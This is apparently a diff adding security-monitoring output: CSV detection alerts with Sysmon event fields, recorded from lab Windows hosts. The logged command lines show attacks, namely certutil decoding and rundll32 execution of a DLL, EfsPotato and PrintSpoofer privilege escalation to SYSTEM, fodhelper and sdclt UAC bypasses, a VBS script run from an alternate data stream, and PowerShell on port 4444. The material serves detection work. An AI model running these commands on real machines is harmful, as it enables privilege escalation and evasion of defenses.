+ C:\temp\EfsPotato.exe
+ c:\temp\EfsPotato.exe whoami
+
+",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435978.711831,2019-07-30T01:32:58.711831+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil -f -decode fi.b64 AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4888
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:32:58.614
+ 747F3D96-660A-5D3F-0000-0010B9E08500
+ 3184
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c certutil -f -decode fi.b64 AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557495209.424885,2019-05-10T17:33:29.424885+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\Windows\System32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 15677
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-10 13:32:54.034
+ 365ABB72-7D86-5CD5-0000-0010CC2E1400
+ 2076
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "c:\Windows\System32\cmd.exe"
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-79DF-5CD5-0000-0020F8410100
+ 0x141f8
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-7D85-5CD5-0000-001047061400
+ 2536
+ C:\Windows\System32\CompMgmtLauncher.exe
+ "C:\Windows\System32\CompMgmtLauncher.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1561018078.816185,2019-06-20T12:07:58.816185+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 8119
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-06-20 08:07:52.956
+ 365ABB72-3ED8-5D0B-0000-0010398F1A00
+ 1476
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami
+ c:\ProgramData\
+ IEWIN7\IEUser
+ 365ABB72-3991-5D0B-0000-002029350100
+ 0x13529
+ 1
+ High
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-3ED4-5D0B-0000-0010B2871A00
+ 1440
+ C:\Windows\System32\cmd.exe
+ "cmd"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17715
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-14 02:32:48.290
+ 365ABB72-28D0-5CDA-0000-00103A6B1300
+ 2676
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /groups
+ C:\temp\PowerShell-Suite-master\
+ IEWIN7\IEUser
+ 365ABB72-26E1-5CDA-0000-002087350100
+ 0x13587
+ 1
+ Medium
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-28A0-5CDA-0000-001074181300
+ 2016
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contain suspicious command ( whoami.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17715
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-14 02:32:48.290
+ 365ABB72-28D0-5CDA-0000-00103A6B1300
+ 2676
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /groups
+ C:\temp\PowerShell-Suite-master\
+ IEWIN7\IEUser
+ 365ABB72-26E1-5CDA-0000-002087350100
+ 0x13587
+ 1
+ Medium
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-28A0-5CDA-0000-001074181300
+ 2016
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435978.659405,2019-07-30T01:32:58.659405+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4887
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:32:57.600
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6056-5D3F-0000-0010C9EF4100
+ 4600
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 342417
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-12 13:06:08.141
+ 747F3D96-E940-5F33-0000-001039310F00
+ 7460
+ C:\Windows\System32\whoami.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami.exe
+ whoami
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-E909-5F33-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
+ 747F3D96-E93C-5F33-0000-0010A6F00E00
+ 8032
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1561018072.95681,2019-06-20T12:07:52.956810+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 38208 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 8118
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-06-20 08:07:48.721
+ 365ABB72-3D05-5D0B-0000-001004220D00
+ 816
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ IEWIN7\IEUser
+ tcp
+ false
+ false
+ 10.0.2.13
+ IEWIN7
+ 4444
+
+ false
+ 10.0.2.18
+
+ 38208
+
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1590282859.005259,2020-05-24T05:14:19.005259+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 196375
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-24 01:13:54.117
+ 747F3D96-CA52-5EC9-0000-001027FA3700
+ 4456
+ C:\Windows\System32\whoami.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami.exe
+ whoami
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-BDD1-5EC9-0000-0020E7030000
+ 0x3e7
+ 1
+ System
+ SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
+ 747F3D96-CA4E-5EC9-0000-00109FE23700
+ 1516
+ C:\Windows\System32\cmd.exe
+ c:\Windows\System32\cmd.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564903596.239723,2019-08-04T11:26:36.239723+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5637
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-04 07:26:35.116
+ 747F3D96-88AB-5D46-0000-001081ED7D03
+ 4300
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020B3D31800
+ 0x18d3b3
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-88AA-5D46-0000-001093E37D03
+ 4644
+ C:\Windows\System32\dllhost.exe
+ C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe") ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 110435
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-02 18:01:57.417
+ 747F3D96-B595-5EAD-0000-00106BFDC200
+ 6004
+ C:\Windows\System32\whoami.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami.exe
+ "C:\Windows\system32\whoami.exe"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-6ABB-5EAD-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
+ 747F3D96-B592-5EAD-0000-0010D4CDC200
+ 1428
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,User Name : ( NT AUTHORITY\SYSTEM ) with Command Line : ( "C:\Windows\system32\whoami.exe" ) contain suspicious command ( whoami.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 110435
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-02 18:01:57.417
+ 747F3D96-B595-5EAD-0000-00106BFDC200
+ 6004
+ C:\Windows\System32\whoami.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami.exe
+ "C:\Windows\system32\whoami.exe"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-6ABB-5EAD-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
+ 747F3D96-B592-5EAD-0000-0010D4CDC200
+ 1428
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 342416
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-12 13:06:04.074
+ 747F3D96-E93C-5F33-0000-0010A6F00E00
+ 8032
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-E909-5F33-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-E93B-5F33-0000-001003BA0E00
+ 7920
+ C:\Windows\System32\wermgr.exe
+ C:\Windows\system32\wermgr.exe -upload
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 11267
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-09 03:25:24.677
+ 365ABB72-9DA4-5CD3-0000-00107F7A2F00
+ 2920
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe" /name Microsoft.BackupAndRestoreCenter
+ C:\Users\IEUser\AppData\Local\Temp\onedrive\
+ IEWIN7\IEUser
+ 365ABB72-94CD-5CD3-0000-0020DD3A0100
+ 0x13add
+ 1
+ Medium
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-9DA4-5CD3-0000-00102E692F00
+ 3184
+ C:\Windows\System32\sdclt.exe
+ "C:\Windows\system32\sdclt.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557370343.531513,2019-05-09T06:52:23.531513+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 11242
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-09 02:52:23.515
+ 365ABB72-95E7-5CD3-0000-001004970F00
+ 3784
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs""
+ C:\Users\IEUser\AppData\Local\Temp\onedrive\
+ IEWIN7\IEUser
+ 365ABB72-94CD-5CD3-0000-0020DD3A0100
+ 0x13add
+ 1
+ Medium
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-9570-5CD3-0000-00103FC90A00
+ 1900
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436045.252684,2019-07-30T01:34:05.252684+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32 AllTheThings.dll,EntryPoint )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4965
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:34:05.213
+ 747F3D96-664D-5D3F-0000-0010F1498C00
+ 6836
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c rundll32 AllTheThings.dll,EntryPoint
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1088] Bypass User Account Control - Process,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5277
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 10:14:08.401
+ 747F3D96-5E70-5D45-0000-0010FCDD9D00
+ 3656
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020B3D31800
+ 0x18d3b3
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-5E6F-5D45-0000-001014CA9D00
+ 8180
+ C:\Windows\System32\fodhelper.exe
+ "C:\Windows\system32\fodhelper.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1561018068.92556,2019-06-20T12:07:48.925560+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 8116
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-06-20 08:07:48.909
+ 365ABB72-3ED4-5D0B-0000-0010B2871A00
+ 1440
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "cmd"
+ c:\ProgramData\
+ IEWIN7\IEUser
+ 365ABB72-3991-5D0B-0000-002029350100
+ 0x13529
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-3D05-5D0B-0000-001004220D00
+ 816
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5277
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 10:14:08.401
+ 747F3D96-5E70-5D45-0000-0010FCDD9D00
+ 3656
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020B3D31800
+ 0x18d3b3
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-5E6F-5D45-0000-001014CA9D00
+ 8180
+ C:\Windows\System32\fodhelper.exe
+ "C:\Windows\system32\fodhelper.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556610375.246489,2019-04-30T11:46:15.246489+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c echo msdhch > \\.\pipe\msdhch ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 8575
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 07:46:15.183
+ 365ABB72-FD47-5CC7-0000-00106AF61D00
+ 4088
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c echo msdhch > \\.\pipe\msdhch
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-F6A1-5CC7-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-F6A1-5CC7-0000-001004550000
+ 468
+ C:\Windows\System32\services.exe
+ C:\Windows\system32\services.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include (powershell, -c , -i ,powershell) in event with Command Line (powershell.exe) and Parent Image :C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe , Parent CommandLine (PrintSpoofer.exe -i -c powershell.exe) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 110434
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-02 18:01:54.866
+ 747F3D96-B592-5EAD-0000-0010D4CDC200
+ 1428
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ PowerShell.EXE
+ powershell.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-6ABB-5EAD-0000-0020E7030000
+ 0x3e7
+ 0
+ System
